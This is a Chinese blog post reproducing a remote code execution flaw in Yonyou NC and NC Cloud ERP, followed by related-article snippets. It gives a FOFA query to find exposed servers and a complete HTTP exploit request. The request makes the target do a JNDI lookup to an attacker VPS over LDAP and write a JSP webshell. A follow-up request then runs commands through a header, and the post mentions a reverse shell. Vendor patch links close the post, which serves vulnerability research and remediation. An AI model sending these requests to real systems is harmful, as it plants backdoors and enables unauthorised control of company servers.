用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)

最新推荐文章于 2025-03-02 22:44:04 发布
最新推荐文章于 2025-03-02 22:44:04 发布
阅读量1.1w 收藏 11
点赞数 12
分类专栏: 漏洞复现v1 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/131456781
版权
本文介绍了用友NC系列及NC Cloud存在的任意文件上传漏洞,详细解析了攻击者如何利用uapjs应用进行远程代码执行,通过上传恶意文件并触发JNDI注入,实现服务器后门预埋。同时提供了各版本的修复补丁链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

        用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

     用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器

0x03 影响范围

NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207

0x04 复现环境

 FOFA:app="用友-NC-Cloud"

 0x05 漏洞复现

 准备JNDI注入工具

 https://github.com/WhiteHSBG/JNDIExploit

  EXP:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}

利用思路:调用”nc.itf.iufo.IBaseSPService“服务中的"saveXStreamConfig"的方法,来接受对象和字符串,使用Java反射机制创建了一个javax.naming.InitialContext对象,并通过LDAP协议连接到指定的IP地址和端口,最后在根目录生成jsp恶意后门程序

EXP中使用的是JNDI工具的TomcatEcho回显链

上传恶意文件

 开启ldap监听

 执行命令并回显

GET /jndi.jsp HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
cmd: whoami

反弹shell

 

 0x06 修复建议

打对应补丁,重启服务,各版本补丁获取方式如下:

NC63方案

补丁名称:NC63uapjs安全问题补丁

补丁编码:NCM_NC6.3_000_UAP_BTS_20230308_GP_268498360

https://dsp.yonyou.com/patchcenter/patchdetail/10231678268499522701/0/2

 

NC633方案

补丁名称:NC633uapjs安全问题补丁

补丁编码:NCM_NC6.33_000_UAP_BTS_20230308_GP_268527193

https://dsp.yonyou.com/patchcenter/patchdetail/10231678268528400707/0/2

 

NC65方案

补丁名称:NC65uapjs安全问题补丁

补丁编码:NCM_NC6.5_000_UAP_BTS_20230308_GP_269462199

https://dsp.yonyou.com/patchcenter/patchdetail/10231678269463403718/0/2

 

NCC1903方案

补丁名称:NCC1903uapjs安全问题补丁

补丁编码:NCM_NCCLOUD1903_10_UAP_BTS_20230308_GP_268560504

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268561687890/0/2

NCC1909方案

补丁名称:NCC1909uapjs安全问题补丁

补丁编码:NCM_NCCLOUD1909_10_UAP_BTS_20230308_GP_268596672

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268597774895/0/2

 

NCC2005方案

补丁名称:NCC2005uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2020.05_10_UAP_BTS_20230308_GP_268622200

https://dsp.yonyou.com/patchcenter/patchdetail/10231678944167066463/0/2

 

NCC2105方案

补丁名称:NCC2105uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2021.05_10_UAP_BTS_20230308_GP_268652747

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268653876905/0/2

 

NCC2111方案

补丁名称:NCC2111uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2021.11_010_UAP_BTS_20230308_GP_268680318

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268681473910/0/2

 

YonBIP高级版2207方案

补丁名称:YonBIP高级版2207uapjs安全问题补丁

补丁编码:NCM_YONBIP高级2207_010_UAP_BTS_20230308_GP_267337472

https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2

CNVD-C-2023-76801用友NC uapjs RCE漏洞复现[附POC]
薛定谔嘚喵博客
11-08 1291
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs (jsinvoke)应用构造恶意请求非法上传后门程序此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友NC-uapjs代码执行漏洞(含批量验证poc)
weixin_43567873的博客
04-07 372
用友NC-uapjs代码执行漏洞(含批量验证poc)
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9459
用友NC 漏洞汇总
用友NC系列漏洞检测利用工具
最新发布
m0_74786138的博客
03-02 417
声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 1971
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
用友NC BeanShell存在命令执行漏洞CNVD-2021-30167)
maverickpig的博客
03-10 6334
用友命令执行漏洞复现
用友NC存在命令执行漏洞(CNVD-2021-30167)复现
嘟的博客
07-07 7178
漏洞说明: 2021年5月27日,国家信息安全漏洞共享平台(CNVD)公布了用友NC存在命令执行漏洞CNVD-2021-30167),用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。 2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。由于用友NC对外开放了BeanShell的测试接口,未经身份验证的攻击者利用该测试接口,通过向目标服务器发送恶意构造的Http请求,在..
泛微OA漏洞学习——E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
记录并分享学习安全的知识点..
07-10 1829
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。......
用友NC FileUploadServlet 反序列化RCE漏洞复现
0xSec
12-04 2043
用友 NC nc.file.pub.imple.FileUploadServlet 反序列化漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC BeanShell RCE漏洞
qq_44484541的博客
11-01 1143
用友 NC 是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。用友 NC 由于对外开放了 BeanShell 接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。该漏洞为第三方 Jar 包漏洞导致,用友 NC 官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。3.这里有执行代码的接口,输入payload如:exec(“whoami”);2.访问路径/servlet/~ic/bsh.servlet.BshServlet。
漏洞复现用友NC——文件上传漏洞
weixin_54799594的博客
07-16 1885
漏洞复现过程记录
【HW必备】用友NC-Cloud存在17处漏洞合集
小司机的奥拓
06-24 1290
高质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。如果师傅还是新手,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑,内部分享的POC可以助你在Edu和补天等平台获得一定的排名。如果师傅已经是老手了,有一个高质量的LD库也能为你的工作提高极大的效率,实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。Cmd5解密,各种漏洞利用工具及后续更新,渗透工具、文档资源分享。
用友NC-uapjs代码执行漏洞(含批量验证poc),2024年最新网络安全开发两年
m0_60226911的博客
04-16 377
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。通过MethodInvocationHandler类中的异常处理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口。或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!用友NC Cloud 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。包括了nc所有系列版本。
用友NC远程命令执行漏洞通告
爱国小白帽
06-04 9444
用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月04日, 360CERT监测发现国内安全组织发布了用友NC远程命令执行漏洞的风险通告,漏洞等级:高危。 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。 用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。 目前该漏洞暂无安全补丁发布,360
用友NC-uapjs代码执行漏洞(含批量验证poc),2024年最新2024年网络安全网络编程总结篇
2301_82243679的博客
04-18 502
包括了nc所有系列版本。
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 790
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友GRP-u8 XXE 漏洞复现
Adminxe的博客
09-23 2237
0x00 漏洞描述 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 0x01 漏洞利用条件 无需登录 0x02 漏洞复现 POC: POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: localhost Content-Lengt...
漏洞复现用友NC Cloud系统queryPsnInfo接口SQL注入
今天是几号的博客
08-05 1337
在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
Fastjson反序列化远程代码执行漏洞CNVD-2020-30827)漏洞复现
12-28
### 复现 FastJSON 反序列化远程代码执行漏洞 CNVD-2020-30827 #### 准备工作 为了复现漏洞,需准备以下条件: - 使用受影响版本的 FastJSON 库(<= 1.2.64),因为这些版本存在反序列化过程中处理 `@type` 字段的安全缺陷[^1]。 - 构建一个能够接收 JSON 输入的应用程序接口。 #### 漏洞原理说明 FastJSON 在解析含有 `@type` 的 JSON 数据时会尝试实例化对应的 Java 类对象。如果应用程序允许不受信任的数据源提供此类输入,则可能触发任意代码执行。特别是当开启 autotype 功能后,风险显著增加,攻击者可以通过精心构造的 payload 实现 RCE (Remote Code Execution)。 #### 利用过程描述 构建恶意负载的关键在于找到合适的 gadget chain 来达成最终的目标——执行任意命令。对于 CNVD-2020-30827 特定情况而言,通常涉及利用某些标准库中的类作为起点,比如 JdkSerializeRMI 或其他能间接导致 shell 命令被执行的方法路径。 具体来说,可以创建如下结构的 JSON 负载用于测试目的(请注意这仅限于合法授权下的安全研究环境内操作): ```json { "@type": "java.net.InetAddress", "val": "localhost" } ``` 上述例子展示了最基础形式之一;实际攻击场景下可能会更加复杂,并且依赖具体的业务逻辑以及可用 gadgets 组合而成更强大的链路来完成整个攻击面覆盖。 #### 安全建议 鉴于该类型的漏洞可能导致严重的安全隐患,在生产环境中应严格限制对外部可控数据使用 FastJSON 进行反序列化操作,并及时升级至官方发布的最新稳定版以获得必要的修复补丁和支持。
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值